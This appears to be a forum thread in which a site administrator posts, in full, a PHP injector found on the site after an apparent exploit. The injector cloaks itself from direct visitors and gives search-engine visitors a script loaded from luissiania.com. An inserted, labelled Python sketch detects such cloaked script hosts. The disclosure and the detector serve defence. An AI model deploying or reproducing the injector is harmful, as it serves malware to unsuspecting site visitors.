Virus

Started by
10 comments, last by Michael Tanczos 9 years, 4 months ago

Thanks for the additional information! :)

- Jason Astle-Adams

I disabled every ad network we use.. I'm looking for anything else unusual but I'm not seeing anything yet.

UPDATE: Found something.. might have been from a forum exploit. It's removed for now.

UPDATE2: Awesome.. looks like some type of mass exploit.. here was the code:

[source]

function kmhNNPH($p) {
    $m = false;
    $file_d = '/tmp/._tmpURtDPCgF';
    $ip_l = (string)ip2long($p);
    if(file_exists($file_d) and @is_writable($file_d) and (($size_f = @filesize($file_d)) > 0)) {
        $data = file_get_contents($file_d);
        $data .= "$ip_l,";
        if(substr_count($data,"$ip_l,") <= 1) $m = true;
        if($size_f > 1000000) $data = "$ip_l,";
        file_put_contents($file_d,$data);
        return $m;
    } else return true;
}
function VrUJjeJd($p) {
    $sec = 'oTkdDkELRzXFvisX';
    $key = substr(sha1($_SERVER['HTTP_USER_AGENT'].$p.$sec),0,mt_rand(15,39));
    $key = explode("\n",chunk_split($key,(strlen($key)/mt_rand(2,8)),"\n"));
    $b = implode('',array_merge(range('G','Z'),range('g','z'))).'___';
    $g = array();
    foreach($key as $str) {
        if($str == '') continue;
        $n = '';
        for($i = 0;$i<=strlen($str)-1;$i++) {
            $n.= ((mt_rand(1,2) == 1) ? $b[mt_rand(0,42)] : '').$str[$i].((mt_rand(1,2) == 1) ? $b[mt_rand(0,42)] : '');
        }
        $g[] = substr(str_shuffle(implode('',array_merge(range('A','Z'),range('a','z'),range('0','9'))).'____'),0,mt_rand(3,6)).'='.$n;
    }
    $url = '/?'.implode('&',$g);
    return "\r\n<script type=\"text/javascript\" src=\"http://luissiania.com$url\"></script>";
}
function BFaYmrYG() {
    $ip = '';
    if(!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) {
        $arr = explode(',',$_SERVER['HTTP_X_FORWARDED_FOR']);
        if(preg_match('/^\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}$/',$arr['0'])) {
            $ip = $arr['0'];
        }
    }
    return (!empty($ip)) ? $ip : @getenv('REMOTE_ADDR');
}
function GLadUzoz() {
    if(preg_match('#google|msn|live|altavista|ask|yahoo|aol|bing|exalead|excite|lycos|myspace|alexa|doubleclick#i',$_SERVER['HTTP_REFERER'])) {
        if(preg_match('#msie|firefox|opera|chrome|Trident#i',$_SERVER['HTTP_USER_AGENT'])) return true;
    }
}
function PSGAeiAkX($p) {
    $a = array('216.239.','209.85.','173.255.','173.194.','89.207.','74.125.','72.14.','66.249.','66.102.','64.233.');
    foreach($a as $b) {
        if(preg_match("/^$b/i",$p)) return true;
    }
}
function xbNcmYEJ() {
    if(!empty($_SERVER['HTTP_REFERER']) and !empty($_SERVER['HTTP_ACCEPT']) and !empty($_SERVER['HTTP_ACCEPT_LANGUAGE'])) {
        if(GLadUzoz() and ($p = BFaYmrYG()) and !PSGAeiAkX($p) and kmhNNPH($p)) return VrUJjeJd($p);
    }
    return '';
}
return @xbNcmYEJ();
[/source]
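
Added example, not part of the original post or of GameDev.net's code: the snippet above only emits its script tag for requests with a search-engine Referer, a browser User-Agent and non-empty Accept headers, so a site owner browsing directly never sees it. This Python sketch compares the script hosts in a plain response against one fetched with such headers; the header values, the sample HTML, the host `injected.example` and all function names are constructed for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Request headers that pass the gate in the posted code (search-engine Referer,
# browser User-Agent, non-empty Accept / Accept-Language). Constructed values.
PROBE_HEADERS = {
    "Referer": "https://www.google.com/search?q=example",
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; rv:115.0) Gecko/20100101 Firefox/115.0",
    "Accept": "text/html",
    "Accept-Language": "en-US",
}

# Constructed sample responses: the same page fetched without and with PROBE_HEADERS.
PLAIN_HTML = '<html><head><script src="/js/site.js"></script></head><body>ok</body></html>'
PROBED_HTML = (PLAIN_HTML + '\r\n<script type="text/javascript" '
               'src="http://injected.example/?aB3=Gf1z&Qx_9=2hk"></script>')


class _ScriptHosts(HTMLParser):
    """Collects the host of every <script src=...>; relative URLs have no host."""

    def __init__(self):
        super().__init__()
        self.hosts = set()

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        src = dict(attrs).get("src")
        host = urlparse(src).hostname if src else None
        if host:
            self.hosts.add(host.lower())


def script_hosts(html):
    """Return the set of external hosts that the document loads scripts from."""
    parser = _ScriptHosts()
    parser.feed(html)
    return parser.hosts


def cloaked_script_hosts(plain_html, probed_html, allowed_hosts=()):
    """Hosts serving scripts only in the probed response and not allow-listed."""
    allowed = {h.lower() for h in allowed_hosts}
    return script_hosts(probed_html) - script_hosts(plain_html) - allowed


if __name__ == "__main__":
    print(sorted(cloaked_script_hosts(PLAIN_HTML, PROBED_HTML)))
```

The posted code also records each visitor IP in a file under `/tmp` and skips IPs it has already seen, so a repeat probe from the same address can come back clean; an empty result does not clear the site.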

This topic is closed to new replies.